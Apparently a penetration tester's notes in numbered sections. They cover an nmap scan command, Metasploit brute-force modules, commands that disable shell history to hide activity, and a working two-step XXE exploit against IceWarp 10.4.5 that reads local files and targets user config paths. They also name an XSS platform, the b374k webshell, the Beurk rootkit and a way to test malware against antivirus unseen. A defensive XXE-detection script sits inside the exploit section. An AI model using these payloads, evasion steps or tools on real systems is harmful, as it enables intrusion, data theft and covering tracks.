0x1 Penetration testing: information gathering
https://bbs.ichunqiu.com/thread-16020-1-1.htm
0x2 nmap 扫描常用端口命令
nmap -sT -P0 -sV -O --script=banner -p T:21-25,80-89,110,143,443,513,873,1080,1433,1521,1158,3306-3308,3389,3690,5900,6379,7001,8000-8090,9000,9418,27017-27019,50060,111,11211,2049 -oN name.txt 5*.1**.8.*
0x3 Online XSS platform
http://webxss.top/xss/
0x4 Pentest preparation with Kali
information gathering
https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/
smb_version
search portscan
auxiliary/scanner/portscan/tcp
auxiliary/scanner/portscan/syn
1) Domain admin password brute force: smb_login module
2) GPP password
3) Port, service, web
0x5 Linux pentesting without leaving shell history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
0x6 IceWarp 10.4.5 XXE injection
target:https://mail.***.com/rpc/gw.html
POST the payloads below
Two steps: the first step returns a value, which is filled into the second step
Verify with the file c:/windows/win.ini
IceWarp default installation paths are as follows
c:/PROGRA~2/IceWarp/config/domains.cfg
c:/PROGRA~2/IceWarp/config/***/users.cfg
*** is the domain site read from the first file
users.cfg is encrypted
payload1:
<?xml version="1.0"?>
<methodCall>
<methodName>LoginUser</methodName>
<params>
<param><value></value></param>
</params>
</methodCall>
90ae4b8c70ba07ab8c82024a488b3da6
payload2:
<?xml version="1.0"?>
<!DOCTYPE OpenVAS [<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">]>
<methodCall>
<methodName>ConvertVersit</methodName>
<params>
<param><value>90ae4b8c70ba07ab8c82024a488b3da6</value></param>
<param><value>OpenVAS;&bar;</value></param>
<param><value>XML</value></param>
</params>
</methodCall>
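From the defender's side, the two payloads above are easy to tell apart: a normal XML-RPC call never carries a DOCTYPE, and the second one declares an external entity whose URI is a php:// filter wrapper pointing at a local file. The following is an added example, not code from the original notes or from IceWarp, of a request-body check that a reverse proxy or WAF could run before the XML reaches the application. The sample request bodies are constructed here; the hash value is a placeholder, not the real session value.

```python
"""Flag external-entity (XXE) declarations in XML-RPC request bodies.

Added example for defenders: detects DTDs that declare SYSTEM/PUBLIC entities
so that requests such as the ConvertVersit call above can be logged or blocked
before the XML parser sees them.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri"> (parameter entity)
# and <!ENTITY name PUBLIC "pubid" "uri">
_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+"
    r"(?:\"[^\"]*\"\s+)?(?P<uri>\"[^\"]*\"|'[^']*')",
    re.IGNORECASE,
)
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_METHOD_RE = re.compile(r"<methodName>\s*([^<\s]+)\s*</methodName>", re.IGNORECASE)

# URI schemes through which an entity can read local files or reach the network.
# The php:// filter wrapper is what payload2 above uses to base64-encode the file
# so that its contents survive XML parsing.
RISKY_SCHEMES = ("file:", "php:", "http:", "https:", "ftp:", "expect:", "jar:", "gopher:", "netdoc:")


@dataclass
class XxeFinding:
    method: Optional[str]
    has_doctype: bool
    entities: List[Tuple[str, str]] = field(default_factory=list)  # (entity name, uri)
    risky: bool = False  # True when any entity URI uses a scheme from RISKY_SCHEMES


def inspect_xmlrpc_body(body: str) -> XxeFinding:
    """Describe the DTD/entity usage of one request body without parsing it as XML."""
    m = _METHOD_RE.search(body)
    finding = XxeFinding(
        method=m.group(1) if m else None,
        has_doctype=bool(_DOCTYPE_RE.search(body)),
    )
    for ent in _ENTITY_RE.finditer(body):
        uri = ent.group("uri")[1:-1]  # strip the surrounding quotes
        finding.entities.append((ent.group("name"), uri))
        if uri.lower().startswith(RISKY_SCHEMES):
            finding.risky = True
    return finding


def should_block(body: str) -> bool:
    """Policy: XML-RPC never needs a DTD, so reject any body that declares external entities."""
    f = inspect_xmlrpc_body(body)
    return f.has_doctype and bool(f.entities)


# Constructed sample request bodies (the hash is a placeholder, not a real session value).
BENIGN_LOGIN = """<?xml version="1.0"?>
<methodCall><methodName>LoginUser</methodName>
<params><param><value></value></param></params></methodCall>"""

XXE_CONVERT = """<?xml version="1.0"?>
<!DOCTYPE OpenVAS [<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">]>
<methodCall><methodName>ConvertVersit</methodName>
<params><param><value>PLACEHOLDER_SESSION_VALUE</value></param>
<param><value>OpenVAS;&bar;</value></param>
<param><value>XML</value></param></params></methodCall>"""

XXE_PARAM_ENTITY = """<?xml version="1.0"?>
<!DOCTYPE x [<!ENTITY % dtd SYSTEM "file:///etc/hosts"> %dtd;]>
<methodCall><methodName>ConvertVersit</methodName><params></params></methodCall>"""


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_LOGIN), ("xxe", XXE_CONVERT), ("param", XXE_PARAM_ENTITY)):
        f = inspect_xmlrpc_body(body)
        print(f"{label}: method={f.method} doctype={f.has_doctype} entities={f.entities} "
              f"risky={f.risky} block={should_block(body)}")
```

The check deliberately uses regular expressions on the raw body rather than an XML parser, so the decision is made before any entity could be expanded; the corresponding application-side fix is to configure the XML-RPC parser to refuse DTDs altogether.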
0x7 Capturing HTTPS with Burp Suite
Set the proxy to apply to all protocols, and tick the box in the browser's network settings
Burp Suite
proxy->options->edit->certificate->use a self-signed certificate
0x8 Finding the real IP behind Cloudflare
http://www.crimeflare.com/cfs.html#box
0x9 Webshell for file inclusion vulnerabilities
b374k
0x10 Finding other websites on the same server
http://www.yougetsignal.com/tools/web-sites-on-web-server/
0x11 Linux rootkit
Beurk
0x12 Checking AV detection without the sample being distributed
nodistribute.com